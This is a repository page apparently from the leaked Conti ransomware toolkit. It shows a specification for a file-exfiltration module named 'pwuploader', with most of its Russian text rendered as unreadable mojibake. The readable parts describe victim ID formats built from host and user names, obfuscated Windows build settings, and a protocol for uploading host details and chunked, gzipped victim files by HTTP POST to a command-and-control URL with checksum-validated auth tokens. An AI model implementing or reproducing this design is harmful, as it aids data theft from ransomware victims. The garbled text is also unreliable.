Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

147 lines
7.1 KiB

  1. ������� ������ ��� ����������� ������ � ����������
  2. ����������� �������
  3. ���������� ��������� - ����� � ����������� ������ � ����������
  4. �������� ������� pwuploader
  5. �������� � ����������
  6. ��������� ������ ���� ��������� ��� .exe-����, �� ����������� ���������� � ��������� ������.
  7. 1. ��������� ���� ����� �� �������� ������, ���������������� ������� Windows (������� F3 � ����������).
  8. ������ �������� ���� ����������� � ���������.
  9. 2. ��� ��������� ����� ���������� �� ��������� �������� ������.
  10. 3. ��� ��������� ������������ ID, ������ ���������� ��������� PROMPT.
  11. � ���� ���������� ����� ���������� �� ������� ��� DOS/Windows ����������� ��������� ������,
  12. � ������ ������������� ���������.
  13. ������ ������ �� ����������� , (�������) �� ��� �����:
  14. - Client ID
  15. - Group ID
  16. - IP address
  17. ���� ������ �� �������� (����� ������ ��� ������), ��� ����� �� ����� �� �����, ��������� �������� ���� ����� ��:
  18. Client ID: %MACHINE%-%USER%_W%winver%.%hex32% (���������� �� �����, ������������ ����)
  19. Group ID: nop000
  20. IP address: 0.0.0.0
  21. Id ������� - ��� ������, ��������� �� ���� ����������� ����������� ������.
  22. ������ ����� ����� ������ %MACHINE%-%USER%_XYYYYYYY, ���
  23. MACHINE - ��� ����������
  24. USER - ��� �����
  25. X - ������ ������������ ��� ������� �� ������� �������� ������
  26. (W - windows, L - linux, A - �������, M - Mac OS),
  27. YYYYYYY - 3-7 ���� ���������� major-version, minor-version � build ������������ ������� ���� ������� ������� � ������
  28. (��������, ��� 6.1 build 7600 ��� ����� 617600).
  29. ������ ����� �������� 32 ��������� �������� 0-9, A-F.
  30. ������ id ������� - HOSTNAME-USER_W617600.11223344556677889900AABBCCDDEEFF.
  31. �������� �� ������������ � ��������.
  32. 4. ��� �������� ������ �� ���� (�������� HTTP), ��� HTTP-����, �� ������������ � 200, �������� �������.
  33. ��� �������� �������� (��� ��-200 ��� ���������� ������) ������ ������������� ������ ������� � ��������� � ��� � �������.
  34. 5. ����� ������� ���������� � ���������.
  35. ��������� ������ ����� �������� ��� �� HTTP, ��� � �� HTTPS - ��� ����� ����� ������������ ������� WinInet/WinHTTP.
  36. 6. ��������� ������ ������� ���� � ����� ����� ����������.
  37. ���������� ������
  38. 1. ���� ������ ���������� Microsoft, �� ������ ������� ������ Microsoft Visual Studio ������ �� ���� 2015.
  39. 2. ������ Visual Studio ������ ���� �������� ��������� �������:
  40. * ��� ���� �������� ������:
  41. - �������� �������: $(SolutionDir)Bin\$(PlatformTarget)\$(Configuration)\
  42. - ������������� �������: $(SolutionDir)\obj\$(Platform)\$(Configuration)\$(ProjectName)\
  43. - ����������������� ����������: ��
  44. * ������� Release:
  45. - ������ ���������� ���������� (�/�++ �������� ����): ���
  46. - ��������� ���������� ���������� (�����������/�������): ���
  47. 3. ������ ������������� ����������� Andrivet (���������, ��.������ _STR())
  48. 4. ��������� ������ ������������� ����������� GetApi.h. ���� ������������, ���������� ���������� ����� ������ �������.
  49. 5. ������ ������ ����� ��� ������ - x32- � x64-���������.
  50. 6. � ������ ������ ������ ���� ������������� �� ��������� ������, �������� ��������� ���������� �����.
  51. 7. ������ ������ ����� ���������� ������. ���������� ����� ������ ���������� � modulename.log (���� � ���� ������������� � �������).
  52. ������ ������ ���� ������ ��������� ��������� ����� � ��������� �� �������.
  53. 8. � ������� ������ ���� ���� �������� config.h (�������� �������, ����� ���� - ����� ��� ���������� ��������� - ����, �������-������������� �������� ���������� ���).
  54. 9. ������ ������ �������� �� ���� ����������� ������� Windows.
  55. ����������� �������������� ������ Windows - Windows XP (���� ���������� - Windows Vista).
  56. 10. ������������� � ���������� ������ ����������� ���� notelemetry.obj (https://stackoverflow.com/questions/37761768/how-to-prevent-visual-studio-2015-update-2-to-add-telemetry-main-invoke-trigger)
  57. �������� �������� ������
  58. 1) �� ������ ������������ �������� ���������� � ���������� ����� HTTP POST � ���������� multipart/form-data (���������� ������� �������� html-�����).
  59. POST �������� ��������� ����:
  60. timestamp - ��������� UNIX-�����
  61. ip - ���� IP address
  62. ip1 - ����� ������� �������� ���������� (� ������ ���������� ���� � ���������� �������� ����������� �� ������������; ���������������)
  63. ip2 - ����� ������� �������� ����������
  64. ...
  65. ipN - ����� N-�� �������� ����������
  66. cid - ���� Client ID
  67. group - ���� Group ID
  68. hostname - ��� �����, ���������� ����� GetComputerName()
  69. source - ������ `pw'
  70. �������� ���������� �� url ����:
  71. http://foo.com/<junk>/<auth>/<junk>
  72. junk - ������������ �������, ���������� � URI, ����� ����� /
  73. auth - ������������ ������. ��������������, ��� ��� ��� ���������� ������,
  74. ������ ����� ������� ������������ ���� ������.
  75. ��� - ������ ����� �����.
  76. � ��� �����������:
  77. - ����� Z � ����� �������
  78. - ����� ���� (�� �����!) � 6 �� 15-� ������� ������ ���� 31.
  79. ������� ����� ���� - ������. � ��������� ��� ����� ���������� � Z.
  80. ������ ������ - abcde7ol7k9hi8mZ
  81. 2) ����� ������������ ������ ���� �� ������, �������� HTTP POST, � ���������� multipart/form-data.
  82. ���� ���������� � ���� file.
  83. ��� ����� ������� �� ���� Content-Disposition; ��� ���������� ����� �� URI ������������.
  84. ��� ����:
  85. - �������� ����� ���������� � �����. � �������, ���� ���� ������ 100�, �� ���������� ��������� 10� �����.
  86. - ����� �������� ����� ����� � ��������� �������������, ��������� ���������� ���������, � ���������� ��������� �����.
  87. - ����� ���������, ������������ ����� ����� �������� � ������ � ��������� ���������� gzip.
  88. - �������� ������������ �� URL ����
  89. junk - ������������ �������, ���������� � URI, ����� ����� /
  90. auth - ������������ ������. ��� - ������ ����� �����, � ������� �����������
  91. - ����� S � ����� �������
  92. - ����� ���� (�� �����!) � 8 �� 15-� ������� ������ ���� 25.
  93. cid - ���� Client ID
  94. filename - ��� ����� � ��������� URL Encoded;
  95. start - ��������� �������� ������������� ����� ������������ ������ �����; ����� ��������� � �����, � �����.
  96. �� ��������� �������� ������ �����, � ������� ��������� � ������.
  97. ��������, 0A -- ��� ����� 0 (����� 0 ��������, ����� A ������������).
  98. end - �������� �������� ������������� ����� ������������ ������ �����; ������� �� ��, ��� � ��� start.
  99. ��������, 3A5A2A3A9A5A9A - ��� 3523959.
  100. eof - ������� ����� �����. ���� ������� ����, ��� ��������� ����� �����; � �������� (������ ��������������)
  101. ��� ������ ����� �����, � ������� �����������:
  102. - ������ ����� ������ ��� 0
  103. - ��������� ����� A ��� F
  104. ��� ��������� ������, ��� HTTP-������ 200 �� ������� �� ������ ��������,
  105. �� ��� ��-200 ������� � �������� �������� (��������, 50* ��� 40* �� ������).
  106. ������ ��� �������� ���������� ������ XML � ���� HTTP-������, ������ ���� <response>.
  107. ��� ��������� ���� ������ ���� 4041, ���������� ������ 1 - ��� ���������� ��� ������ ������� (������� ������ �� ����� �������).
  108. ��������, ��������� ����� ��������������� �� ������ � ����� 9:
  109. HTTP/1.1 200 OK
  110. Server: nginx/1.10.3 (Ubuntu)
  111. Date: Mon, 07 Oct 2019 13:08:44 GMT
  112. Content-Type: application/xml; charset=UTF-8
  113. Transfer-Encoding: chunked
  114. Connection: keep-alive
  115. Vary: Accept
  116. <?xml version="1.0" encoding="UTF-8"?>
  117. <response>4049</response>
  118. ��������� ����� - ������ ����, ��� ��
  119. HTTP/1.1 200 OK
  120. Server: nginx/1.10.3 (Ubuntu)
  121. Date: Mon, 07 Oct 2019 13:08:44 GMT
  122. Content-Type: application/xml; charset=UTF-8
  123. Transfer-Encoding: chunked
  124. Connection: keep-alive
  125. Vary: Accept
  126. <?xml version="1.0" encoding="UTF-8"?>
  127. <response>200</response>